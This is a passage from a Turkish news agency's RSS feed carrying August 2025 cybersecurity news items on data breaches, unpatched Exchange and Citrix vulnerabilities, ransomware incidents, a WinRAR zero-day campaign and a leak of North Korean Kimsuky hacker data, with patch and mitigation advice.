            <description><![CDATA[ Connecticut’un en büyük kredi birliklerinden Connex, Haziran 2025’te yaşanan siber saldırıda 172 bin üyesine ait isim, hesap numarası, kart bilgileri, Sosyal Güvenlik numarası ve devlet kimliklerinin sızdırıldığını duyurdu. Fonlara erişim tespit edilmezken, sahte Connex çalışanlarıyla kimlik avı girişimleri başladığı uyarısı yapıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a447972bb8e.webp" length="50876" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:48 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Connex Credit Union saldırısında kaç kişi etkilendi, hangi bilgiler sızdırıldı, fonlara erişim sağlandı mı, üyeler hangi dolandırıcılık riskleriyle karşı karşıya</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="481" data-end="724"><strong data-start="481" data-end="512">İhlal bir günde fark edildi</strong><br data-start="512" data-end="515">Connex, 2 Haziran 2025’te sistemlerine yetkisiz erişim sağlandığını, ihlalin 3 Haziran’da tespit edildiğini açıkladı. Yapılan incelemelerde bazı dosyaların izinsiz görüntülendiği veya indirildiği belirlendi.</p>
<p data-start="726" data-end="1080"><strong data-start="726" data-end="752">172 bin kişi etkilendi</strong><br data-start="752" data-end="755">27 Temmuz’da tamamlanan incelemede, toplam 172 bin üyenin verilerinin risk altında olduğu tespit edildi. Çalınan bilgiler arasında isimler, hesap numaraları, banka kartı verileri, Sosyal Güvenlik numaraları ve devlet kimlikleri bulunuyor. Şirket, üyelerin hesap bakiyelerine erişildiğine dair bir bulgu olmadığını bildirdi.</p>
<p data-start="1082" data-end="1395"><strong data-start="1082" data-end="1112">Dolandırıcılık riski arttı</strong><br data-start="1112" data-end="1115">Connex, resmi internet sitesine koyduğu uyarıyla üyeleri devam eden oltalama saldırılarına karşı bilgilendirdi. Açıklamada, “Connex hiçbir zaman sizden PIN, şifre veya hesap numarası istemez. Şüpheli bir arama veya mesaj alırsanız telefonu kapatıp doğrudan bizi arayın” denildi.</p>
<p data-start="1397" data-end="1725"><strong data-start="1397" data-end="1439">Geniş çaplı saldırı dalgasının parçası</strong><br data-start="1439" data-end="1442">İhlalin, Salesforce platformlarını hedef alan ShinyHunters grubuyla ilişkilendirilen saldırı dalgasının ardından gelmesi dikkat çekti. Son aylarda Allianz Life, Adidas, Qantas, Louis Vuitton, Dior, Tiffany &amp; Co., Chanel ve Google gibi markalar da benzer saldırılardan etkilenmişti.</p>
<p data-start="1727" data-end="1907"><strong data-start="1727" data-end="1739"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>29 binden fazla Microsoft Exchange sunucusu kritik güvenlik açığına karşı hâlâ yamalanmadı</title>
            <link>https://cumha.com.tr/29-binden-fazla-microsoft-exchange-sunucusu-kritik-guvenlik-acigina-karsi-hala-yamalanmadi</link>
            <guid>https://cumha.com.tr/29-binden-fazla-microsoft-exchange-sunucusu-kritik-guvenlik-acigina-karsi-hala-yamalanmadi</guid>
            <description><![CDATA[ Shadowserver verilerine göre dünya genelinde 29 binden fazla Exchange sunucusu, Nisan 2025’te duyurulan ve CVE-2025-53786 olarak takip edilen yüksek önem dereceli güvenlik açığına karşı korunmasız durumda. Bu açık, saldırganların hibrit ortamlarda yetki yükselterek bulut sistemlerine yayılmasına ve tüm etki alanının ele geçirilmesine yol açabiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a443f4c6cf7.webp" length="84540" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:47 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-53786 açığı saldırganlara hangi imkanları veriyor, dünya genelinde kaç Exchange sunucusu etkileniyor, CISA federal kurumlara hangi adımları zorunlu kıldı, Microsoft hangi yamaları öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="502" data-end="886"><strong data-start="502" data-end="532">Ciddi risk barındıran açık</strong><br data-start="532" data-end="535">CVE-2025-53786, Exchange Server 2016, 2019 ve Subscription Edition sürümlerini etkiliyor. Açık, saldırganların on-premise Exchange sunucularından aldıkları yönetici erişimini kullanarak Microsoft bulut ortamlarında sahte token ve API çağrılarıyla yetki yükseltmesine imkân tanıyor. Bu süreç, iz bırakmadan gerçekleştirilebildiği için tespiti de zor.</p>
<p data-start="888" data-end="1149"><strong data-start="888" data-end="927">29 binden fazla sunucu yamalanmamış</strong><br data-start="927" data-end="930">Shadowserver’ın 10 Ağustos tarihli taramalarına göre dünya genelinde 29.098 sunucu halen yamalanmamış durumda. Bunların 7.200’den fazlası ABD’de, 6.700’den fazlası Almanya’da, 2.500’den fazlası ise Rusya’da bulunuyor.</p>
<p data-start="1151" data-end="1418"><strong data-start="1151" data-end="1185">Microsoft ve CISA’dan uyarılar</strong><br data-start="1185" data-end="1188">Microsoft, açığı Nisan 2025’te yayımladığı bir güvenlik danışmanlığı ve hotfix ile duyurdu. Şirket, “kötüye kullanılma ihtimali yüksek” olarak işaretlediği açık için tüm hibrit yapıların yeni mimariye geçirilmesini tavsiye etti.</p>
<p data-start="1420" data-end="1683">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), 25-02 numaralı acil direktifle federal kurumlara 9 Ağustos Pazartesi sabahına kadar yama yapma zorunluluğu getirdi. CISA ayrıca, federal olmayan kurumların da aynı adımları uygulaması gerektiğini vurguladı.</p>
<p data-start="1685" data-end="1716"><strong data-start="1685" data-end="1714">Alınması gereken önlemler</strong></p>
<ul data-start="1717" data-end="1922">
<li data-start="1717" data-end="1772">
<p data-start="1719" data-end="1772">Microsoft Health Checker script ile ortam taraması,</p>
</li>
<li data-start="1773" data-end="1814">
<p data-start="1775" data-end="1814">EOL sürümlerin internetten ayrılması,</p>
</li>
<li data-start="1815" data-end="1882">
<p data-start="1817" data-end="1882">Exchange 2019 için CU14/15, Exchange 2016 için CU23 yüklenmesi,</p>
</li>
<li data-start="1883" data-end="1922">
<p data-start="1885" data-end="1922">Nisan 2025 hotfix’inin uygulanması.</p>
</li>
</ul>
<p data-start="1924" data-end="2117"><strong data-start="1924" data-end="1967">Uyarı: tam etki alanı ele geçirilebilir</strong><br data-start="1967" data-end="1970">CISA, önlemlerin alınmaması halinde hem hibrit bulut hem de on-premise ortamların tamamen ele geçirilme riskiyle karşı karşıya olduğunu açıkladı.</p>
<p data-start="2119" data-end="2335"><strong data-start="2119" data-end="2131"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>100 milyon dolarlık dolandırıcılık çetesinin “başkanları” ABD’ye iade edildi</title>
            <link>https://cumha.com.tr/100-milyon-dolarlik-dolandiricilik-cetesinin-baskanlari-abdye-iade-edildi</link>
            <guid>https://cumha.com.tr/100-milyon-dolarlik-dolandiricilik-cetesinin-baskanlari-abdye-iade-edildi</guid>
            <description><![CDATA[ ABD Adalet Bakanlığı, 2016–2023 yılları arasında aşk dolandırıcılığı ve kurumsal e-posta saldırılarıyla 100 milyon dolardan fazla para çalan uluslararası bir çetenin dört Ganalı yöneticisinin ülkeye iade edildiğini duyurdu. Sanıklar, 20 yıla kadar hapis cezasıyla karşı karşıya. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a44d565d10a.webp" length="52074" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:46 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>100 milyon dolarlık dolandırıcılık çetesi hangi yöntemleri kullandı, kimler ABD’ye iade edildi, örgütte “chairman” rolü ne anlama geliyor, sanıklar hangi cezalarla karşı karşıya</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="415" data-end="676"><strong data-start="415" data-end="449">Dört üst düzey üye iade edildi</strong><br data-start="449" data-end="452">Gana merkezli dolandırıcılık örgütünün yöneticileri olduğu belirtilen Isaac Oduro Boateng (“Kofi Boat”), Inusah Ahmed (“Pascal”), Derrick Van Yeboah (“Van”) ve Patrick Kwame Asare (“Borgar”), 7 Ağustos’ta ABD’ye getirildi.</p>
<p data-start="678" data-end="1007"><strong data-start="678" data-end="732">Yöntem: aşk dolandırıcılığı ve e-posta saldırıları</strong><br data-start="732" data-end="735">Mahkeme belgelerine göre çete, çoğunlukla yalnız yaşayan yaşlı Amerikalıları sahte romantik ilişkilerle kandırdı. Güven kazandıktan sonra mağdurları para göndermeye ikna ettiler. ABD’deki aracılar parayı akladıktan sonra asıl faillerin bulunduğu Batı Afrika’ya gönderdi.</p>
<p data-start="1009" data-end="1265">Çete aynı zamanda şirketleri de hedef aldı. Çalışanların veya müşterilerin e-posta adreslerini taklit eden sahte hesaplarla finans yetkililerini kandırarak milyonlarca dolarlık havaleler yaptırdılar. Sahte imzalı belgelerle transferleri meşrulaştırdılar.</p>
<p data-start="1267" data-end="1525"><strong data-start="1267" data-end="1303">“Chairmen” adıyla yönetilen yapı</strong><br data-start="1303" data-end="1306">Boateng ve Ahmed örgütte “chairman” (başkan) rolünü üstlenirken, Asare ve Van Yeboah da üst düzey konumlarda faaliyet gösterdi. Van Yeboah’ın özellikle aşk dolandırıcılığı operasyonlarında aktif rol aldığı belirlendi.</p>
<p data-start="1527" data-end="1767"><strong data-start="1527" data-end="1552">Ağır cezalar gündemde</strong><br data-start="1552" data-end="1555">Sanıklar; kablolu dolandırıcılık yapmak ve buna teşebbüs (20 yıla kadar), kara para aklama (20 yıl), çalıntı para alma ve buna teşebbüs (5 yıl) ve çalıntı parayı elde tutma (10 yıl) suçlamalarıyla yargılanacak.</p>
<p data-start="1769" data-end="1965"><strong data-start="1769" data-end="1781"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>MuddyWater bağlantılı DarkBit fidye yazılımı çözüldü, veriler fidye ödemeden kurtarıldı</title>
            <link>https://cumha.com.tr/muddywater-baglantili-darkbit-fidye-yazilimi-coezuldu-veriler-fidye-oedemeden-kurtarildi</link>
            <guid>https://cumha.com.tr/muddywater-baglantili-darkbit-fidye-yazilimi-coezuldu-veriler-fidye-oedemeden-kurtarildi</guid>
            <description><![CDATA[ Siber güvenlik firması Profero, İran destekli MuddyWater grubuyla ilişkilendirilen DarkBit fidye yazılımının şifreleme mekanizmasını kırarak mağdurların verilerini ücretsiz olarak kurtarmayı başardı. 2023’te VMware ESXi sunucularını hedef alan saldırıda 80 Bitcoin fidye istenmiş, ancak saldırganlar ödeme müzakeresine girmemişti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a44d67002fe.webp" length="51830" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:45 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>DarkBit fidye yazılımını hangi grup geliştirdi, Profero şifreleme açığını nasıl buldu, saldırıda hangi sistemler hedef alındı, mağdurlar verilerini nasıl kurtarabildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="478" data-end="868"><strong data-start="478" data-end="521">DarkBit saldırıları ve siyasi arka plan</strong><br data-start="521" data-end="524">2023’te gerçekleşen saldırıların, İran’daki mühimmat fabrikasına yönelik drone saldırılarının ardından misilleme amacı taşıdığı değerlendiriliyor. DarkBit grubu, daha önce İsrail’deki eğitim kurumlarını hedef almış ve propaganda içerikli fidye notları bırakmıştı. İsrail Ulusal Siber Komutanlığı, saldırıları MuddyWater ile ilişkilendirmişti.</p>
<p data-start="870" data-end="1170"><strong data-start="870" data-end="911">Zayıf şifreleme yöntemi tespit edildi</strong><br data-start="911" data-end="914">Profero uzmanları, saldırıda kullanılan DarkBit fidye yazılımını analiz etti. Her dosya için AES-128-CBC ile üretilen anahtarların düşük entropiye sahip olduğu, zaman damgalarıyla birlikte olası kombinasyonların birkaç milyar ihtimale düştüğü keşfedildi.</p>
<p data-start="1172" data-end="1478"><strong data-start="1172" data-end="1204">ESXi sunucularındaki avantaj</strong><br data-start="1204" data-end="1207">Araştırmacılar, VMware sanal disk (VMDK) dosyalarının bilinen başlık baytlarını referans alarak brute force yöntemini hızlandırdı. Ayrıca VMDK dosyalarının seyrek yapısı nedeniyle, şifrelenmemiş geniş boşluklardan değerli verilerin doğrudan kurtarılabildiği belirlendi.</p>
<p data-start="1480" data-end="1756"><strong data-start="1480" data-end="1520">Fidye ödenmeden dosyalar geri alındı</strong><br data-start="1520" data-end="1523">Geliştirilen özel araç sayesinde, saldırganların talep ettiği 80 Bitcoin ödenmeden kritik dosyaların çoğu kurtarıldı. Profero, DarkBit’in fidye yerine veri silici (wiper) kullansaydı amacına daha uygun sonuç alabileceğini belirtti.</p>
<p data-start="1758" data-end="1988"><strong data-start="1758" data-end="1791">Kurtarma aracı halka açılmadı</strong><br data-start="1791" data-end="1794">Profero, DarkBit için geliştirdiği çözüm aracını kamuya açıklamayacağını, ancak gelecekte benzer saldırılardan etkilenen kurumların kendileriyle iletişime geçerek destek alabileceğini duyurdu.</p>
<p data-start="1990" data-end="2175"><strong data-start="1990" data-end="2002"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ESET, WinRAR sıfır gün saldırılarında RomCom’un kullandığı üç ayrı zararlı zincirini ortaya çıkardı</title>
            <link>https://cumha.com.tr/eset-winrar-sifir-gun-saldirilarinda-romcomun-kullandigi-uc-ayri-zararli-zincirini-ortaya-cikardi</link>
            <guid>https://cumha.com.tr/eset-winrar-sifir-gun-saldirilarinda-romcomun-kullandigi-uc-ayri-zararli-zincirini-ortaya-cikardi</guid>
            <description><![CDATA[ Rusya bağlantılı RomCom grubu, CVE-2025-8088 olarak kaydedilen WinRAR yol geçişi açığını kullanarak özel hazırlanmış arşivlerle zararlı yazılımlar dağıttı. ESET’in raporuna göre saldırılar Mythic Agent, SnipBot ve MeltingClaw isimli kötü amaçlı yazılım zincirlerini devreye soktu. Açık, 30 Temmuz’da yayımlanan WinRAR 7.13 sürümüyle kapatıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4517645dc9.webp" length="48270" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:44 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>RomCom grubu WinRAR açığını nasıl kullandı, CVE-2025-8088 açığı hangi zararlı zincirlerle birleşti, saldırılar hangi dosya yollarını hedef aldı, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="503" data-end="766"><strong data-start="503" data-end="534">Sıfır gün olarak kullanıldı</strong><br data-start="534" data-end="537">ESET, 18 Temmuz 2025’te RomCom grubunun WinRAR’daki belirsiz bir yol geçişi açığını istismar ettiğini tespit etti. Açık, alternatif veri akışlarının (ADS) kullanımıyla kötüye kullanılabiliyor ve CVE-2025-8088 olarak kaydedildi.</p>
<p data-start="768" data-end="1082"><strong data-start="768" data-end="814">Zararlı dosyalar Startup klasörüne düşüyor</strong><br data-start="814" data-end="817">Hazırlanan RAR arşivlerinde sahte yollarla doldurulmuş çok sayıda ADS girdisi bulunuyor. Bunlar, zararlı DLL, EXE ve LNK dosyalarının arşiv açıldığında %TEMP% ve %LOCALAPPDATA% klasörlerine, kısayolların ise Windows Başlangıç klasörüne yerleştirilmesini sağlıyor.</p>
<p data-start="1084" data-end="1187"><strong data-start="1084" data-end="1113">Üç farklı saldırı zinciri</strong><br data-start="1113" data-end="1116">ESET, saldırılarda kullanılan üç ayrı enfeksiyon zinciri tespit etti:</p>
<ul data-start="1188" data-end="1508">
<li data-start="1188" data-end="1315">
<p data-start="1190" data-end="1315"><strong data-start="1190" data-end="1207">Mythic Agent:</strong> COM hijacking yoluyla AES şifreli shellcode çalıştırıyor, yalnızca belirli etki alanlarında aktif oluyor.</p>
</li>
<li data-start="1316" data-end="1424">
<p data-start="1318" data-end="1424"><strong data-start="1318" data-end="1330">SnipBot:</strong> Sahte bir PuTTY türeviyle yükleniyor, açılan belgeleri kontrol ederek ek zararlı indiriyor.</p>
</li>
<li data-start="1425" data-end="1508">
<p data-start="1427" data-end="1508"><strong data-start="1427" data-end="1443">MeltingClaw:</strong> RustyClaw üzerinden DLL indirip daha fazla modül çalıştırıyor.</p>
</li>
</ul>
<p data-start="1510" data-end="1692"><strong data-start="1510" data-end="1543">Ek aktörler de açığı kullandı</strong><br data-start="1543" data-end="1546">Bi.Zone, CVE-2025-8088’in yanı sıra CVE-2025-6218 açığını da istismar eden “Paper Werewolf” adını verdiği farklı bir saldırı kümesini raporladı.</p>
<p data-start="1694" data-end="1924"><strong data-start="1694" data-end="1725">Güncelleme manuel yapılmalı</strong><br data-start="1725" data-end="1728">RARLab, açığın kapatıldığı 7.13 sürümünü 30 Temmuz’da yayımladı. Ancak WinRAR otomatik güncelleme özelliği içermediği için kullanıcıların en son sürümü manuel olarak indirip kurmaları gerekiyor.</p>
<p data-start="1926" data-end="2145"><strong data-start="1926" data-end="1947">Risk neden yüksek</strong><br data-start="1947" data-end="1950">Windows 2023’te RAR desteği eklese de kapsamı sınırlı. Kurumsal kullanıcılar ve ileri seviye bireysel kullanıcılar hâlen WinRAR’a bağımlı, bu da yazılımı saldırganlar için cazip hale getiriyor.</p>
<p data-start="2147" data-end="2353"><strong data-start="2147" data-end="2159"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Hollanda’da kritik kurumlar, Citrix NetScaler açığı CVE-2025-6543 ile hedef alındı</title>
            <link>https://cumha.com.tr/hollandada-kritik-kurumlar-citrix-netscaler-acigi-cve-2025-6543-ile-hedef-alindi</link>
            <guid>https://cumha.com.tr/hollandada-kritik-kurumlar-citrix-netscaler-acigi-cve-2025-6543-ile-hedef-alindi</guid>
            <description><![CDATA[ Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), Citrix NetScaler cihazlarındaki CVE-2025-6543 güvenlik açığının kritik kurumlara yönelik saldırılarda istismar edildiğini duyurdu. Bellek taşması hatasından kaynaklanan açık, Mayıs 2025’ten itibaren sıfır gün olarak kullanıldı ve saldırganlar izleri silerek ihlalleri gizledi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4519a97fc0.webp" length="62416" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:43 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-6543 açığı nasıl çalışıyor, Hollanda’da hangi kurumlar etkilendi, saldırılar ne zamandan beri sürüyor, Citrix hangi sürümlere güncelleme yapılmasını öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="466" data-end="751"><strong data-start="466" data-end="512">Bellek taşması sıfır gün olarak kullanıldı</strong><br data-start="512" data-end="515">Citrix NetScaler ADC ve Gateway ürünlerinde bulunan CVE-2025-6543, bellek taşması nedeniyle yetkisiz komut çalıştırılmasına veya hizmet reddine yol açabiliyor. Açık, VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucularını etkiliyor.</p>
<p data-start="753" data-end="998"><strong data-start="753" data-end="783">Kritik kurumlar hedef oldu</strong><br data-start="783" data-end="786">NCSC, Mayıs 2025’ten itibaren saldırganların açığı sıfır gün olarak kullandığını ve Hollanda’daki birden fazla kritik kuruma sızdığını açıkladı. Saldırganlar izlerini silerek olayları tespit etmeyi zorlaştırdı.</p>
<p data-start="1000" data-end="1246"><strong data-start="1000" data-end="1032">Savcılık saldırıyı doğruladı</strong><br data-start="1032" data-end="1035">Hollanda Savcılığı (Openbaar Ministerie), 18 Temmuz’da sistemlerinin ihlal edildiğini duyurdu. Olay ciddi operasyonel kesintilere neden oldu, e-posta sunucuları ancak Ağustos başında yeniden çalışmaya başladı.</p>
<p data-start="1248" data-end="1378"><strong data-start="1248" data-end="1281">Citrix’in yayımladığı yamalar</strong><br data-start="1281" data-end="1284">Citrix, 25 Haziran’da yayımladığı bültende şu sürümlere güncelleme yapılmasını tavsiye etti:</p>
<ul data-start="1379" data-end="1586">
<li data-start="1379" data-end="1411">
<p data-start="1381" data-end="1411">14.1 → 14.1-47.46 ve sonrası</p>
</li>
<li data-start="1412" data-end="1444">
<p data-start="1414" data-end="1444">13.1 → 13.1-59.19 ve sonrası</p>
</li>
<li data-start="1445" data-end="1586">
<p data-start="1447" data-end="1586">13.1-FIPS ve 13.1-NDcPP → 13.1-37.236 ve sonrası<br data-start="1495" data-end="1498">12.1 ve 13.0 sürümleri içinse destek sona erdi, güncel sürümlere yükseltme öneriliyor.</p>
</li>
</ul>
<p data-start="1588" data-end="1877"><strong data-start="1588" data-end="1612">Ek güvenlik adımları</strong><br data-start="1612" data-end="1615">Yamaların ardından aktif oturumların kapatılması (icaconnection, pcoipConnection, aaa, rdp) ve load balancing oturumlarının temizlenmesi tavsiye edildi. Ayrıca NCSC, olağan dışı PHP/XHTML dosyalarının tespiti için GitHub üzerinden bir tarama scripti yayımladı.</p>
<p data-start="1879" data-end="2064"><strong data-start="1879" data-end="1891"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kuzey Koreli Kimsuky hacker grubu, 8,9 GB’lık veri sızıntısıyla ifşa oldu</title>
            <link>https://cumha.com.tr/kuzey-koreli-kimsuky-hacker-grubu-89-gblik-veri-sizintisiyla-ifsa-oldu</link>
            <guid>https://cumha.com.tr/kuzey-koreli-kimsuky-hacker-grubu-89-gblik-veri-sizintisiyla-ifsa-oldu</guid>
            <description><![CDATA[ Kuzey Kore devlet destekli siber casusluk grubu Kimsuky’nin altyapısı, kendilerini “etik hacker” olarak tanımlayan iki kişi tarafından ele geçirildi. DEF CON 33’te duyurulan sızıntıda, Güney Kore kurumlarına yönelik oltalama kayıtları, e-posta sistemlerinin kaynak kodları, sahte kimlik avı araçları ve Kimsuky’nin operasyonel altyapısına dair belgeler yer alıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a451aa1cfbb.webp" length="39068" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:42 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Kimsuky’den sızdırılan veriler neleri içeriyor, sızıntıyı kim üstlendi, bu veri ifşası grubun operasyonlarını nasıl etkileyebilir, güvenlik araştırmacıları sızıntıya nasıl yaklaşıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="498" data-end="872"><strong data-start="498" data-end="529">Kimsuky’ye karşı etik çıkış</strong><br data-start="529" data-end="532">Sızıntıyı gerçekleştiren “Saber” ve “cyb0rg” takma adlı hackerlar, Phrack dergisinin DEF CON 33’te dağıtılan son sayısında, Kimsuky’yi “rejim çıkarlarına hizmet eden, etik dışı bir grup” olarak tanımladı. İkilinin açıklamasında, “Sanatı icra etmek yerine liderlerini zenginleştirmek için çalışan politik bir araçsınız” ifadeleri yer aldı.</p>
<p data-start="874" data-end="1071"><strong data-start="874" data-end="911">8,9 GB veri çevrim içi yayımlandı</strong><br data-start="911" data-end="914">Distributed Denial of Secrets platformunda yayımlanan arşiv, Kimsuky’nin oltalama günlüklerini, çalıntı verilerini ve araçlarını içeriyor. Bunlar arasında:</p>
<ul data-start="1072" data-end="1523">
<li data-start="1072" data-end="1163">
<p data-start="1074" data-end="1163">Güney Kore Savunma Karşı İstihbarat Komutanlığı’na (dcc.mil.kr) ait oltalama kayıtları,</p>
</li>
<li data-start="1164" data-end="1240">
<p data-start="1166" data-end="1240">Güney Kore Dışişleri Bakanlığı’nın e-posta sistemi (“Kebi”) kaynak kodu,</p>
</li>
<li data-start="1241" data-end="1296">
<p data-start="1243" data-end="1296">Vatandaşlık sertifikaları ve akademisyen listeleri,</p>
</li>
<li data-start="1297" data-end="1367">
<p data-start="1299" data-end="1367">Sahte site oluşturma kiti (PHP Generator), canlı oltalama kitleri,</p>
</li>
<li data-start="1368" data-end="1450">
<p data-start="1370" data-end="1450">Cobalt Strike yükleyicileri, ters bağlantı araçları ve Onnara proxy modülleri,</p>
</li>
<li data-start="1451" data-end="1523">
<p data-start="1453" data-end="1523">VPN alımları, GitHub bağlantıları ve hack forumu kullanım kayıtları.</p>
</li>
</ul>
<p data-start="1525" data-end="1804"><strong data-start="1525" data-end="1559">Operasyonel zorluk yaratabilir</strong><br data-start="1559" data-end="1562">Bitirici bir darbe olmasa da, uzmanlara göre bu ifşa Kimsuky’nin altyapısının “yanmasını” sağlayarak devam eden kampanyalarda aksamalara yol açabilir. Ayrıca, sızan belgeler Kimsuky’nin daha önce belgelenmemiş yöntemlerini ortaya çıkarıyor.</p>
<p data-start="1806" data-end="2074"><strong data-start="1806" data-end="1846">Araştırmacılar doğrulamaya çalışıyor</strong><br data-start="1846" data-end="1849">Sızdırılan dosyaların doğruluğu henüz bağımsız olarak tam teyit edilmedi. Ancak içerik, Kimsuky’nin bilinen faaliyetleriyle güçlü örtüşmeler taşıyor. Güvenlik araştırmacıları, sızıntının değerini analiz etmeye devam ediyor.</p>
<p data-start="2076" data-end="2277"><strong data-start="2076" data-end="2088"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Saint Paul siber saldırısının arkasında Interlock fidye yazılım grubu çıktı</title>
            <link>https://cumha.com.tr/saint-paul-siber-saldirisinin-arkasinda-interlock-fidye-yazilim-grubu-cikti</link>
            <guid>https://cumha.com.tr/saint-paul-siber-saldirisinin-arkasinda-interlock-fidye-yazilim-grubu-cikti</guid>
            <description><![CDATA[ Minnesota’nın başkenti Saint Paul’da Temmuz sonunda gerçekleşen siber saldırının Interlock fidye yazılım grubu tarafından düzenlendiği doğrulandı. Şehrin dijital hizmetlerini felç eden saldırı sonrası Ulusal Muhafızlar devreye girdi. Şehir yönetimi fidye ödemeyi reddetti ancak saldırganlar 66 binden fazla dosya çaldıklarını ve bir kısmını sızdırdıklarını iddia ediyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a451d086d6c.webp" length="53548" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:41 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Saint Paul’daki saldırıda hangi hizmetler etkilendi, Interlock hangi verileri sızdırdığını iddia etti, saldırı nasıl gerçekleştirildi, şehir yönetimi fidye talebine nasıl yanıt verdi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="506" data-end="839"><strong data-start="506" data-end="541">Ulusal Muhafızlar devreye girdi</strong><br data-start="541" data-end="544">29 Temmuz’da yaşanan saldırı sonrası Minnesota Valisi Tim Walz, şehrin olay müdahale kapasitesini aşan bu durum için Ulusal Muhafızları siber koruma desteği vermek üzere görevlendirdi. Şehir, çevrim içi ödemeler de dahil olmak üzere birçok hizmetin geçici olarak kesintiye uğradığını açıkladı.</p>
<p data-start="841" data-end="1119"><strong data-start="841" data-end="873">Interlock saldırıyı üstlendi</strong><br data-start="873" data-end="876">Saint Paul Belediye Başkanı Melvin Carter, saldırının Interlock fidye yazılım grubu tarafından gerçekleştirildiğini ve fidye ödenmediğini doğruladı. Carter, vatandaşların kişisel veya finansal bilgilerinin saldırıdan etkilenmediğini söyledi.</p>
<p data-start="1121" data-end="1354"><strong data-start="1121" data-end="1148">66 bin dosya sızdırıldı</strong><br data-start="1148" data-end="1151">Interlock grubu, karanlık ağdaki sitesinde Saint Paul’u hedef olarak listeledi ve 43 GB büyüklüğünde, 66 binden fazla dosyayı ele geçirdiğini öne sürdü. Saldırganlar bu verilerin bir kısmını yayımladı.</p>
<p data-start="1356" data-end="1558"><strong data-start="1356" data-end="1377">Saldırının izleri</strong><br data-start="1377" data-end="1380">PRODAFT’ın açıklamasına göre saldırı, 20 Temmuz civarında şehir sistemlerine bulaştırılan ve Interlock’la ilişkilendirilen özel geliştirilmiş SystemBC RAT zararlısıyla başladı.</p>
<p data-start="1560" data-end="1968"><strong data-start="1560" data-end="1578">Grubun geçmişi</strong><br data-start="1578" data-end="1581">Eylül 2024’te ortaya çıkan Interlock, dünya genelinde özellikle sağlık kuruluşlarını hedef aldı. Daha önce İngiltere’deki üniversitelere NodeSnake trojanıyla saldırmış, DaVita’dan 1,5 TB ve Kettering Health’ten büyük miktarda veri çaldığını duyurmuştu. CISA ve FBI, saldırıdan günler önce Interlock’un kritik altyapılara yönelik çift şantajlı saldırılarında artış olduğunu açıklamıştı.</p>
<p data-start="1970" data-end="2171"><strong data-start="1970" data-end="1982"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>3.300’den fazla Citrix NetScaler cihazı kritik “CitrixBleed 2” açığına karşı yamalanmadan bırakıldı</title>
            <link>https://cumha.com.tr/3300den-fazla-citrix-netscaler-cihazi-kritik-citrixbleed-2-acigina-karsi-yamalanmadan-birakildi</link>
            <guid>https://cumha.com.tr/3300den-fazla-citrix-netscaler-cihazi-kritik-citrixbleed-2-acigina-karsi-yamalanmadan-birakildi</guid>
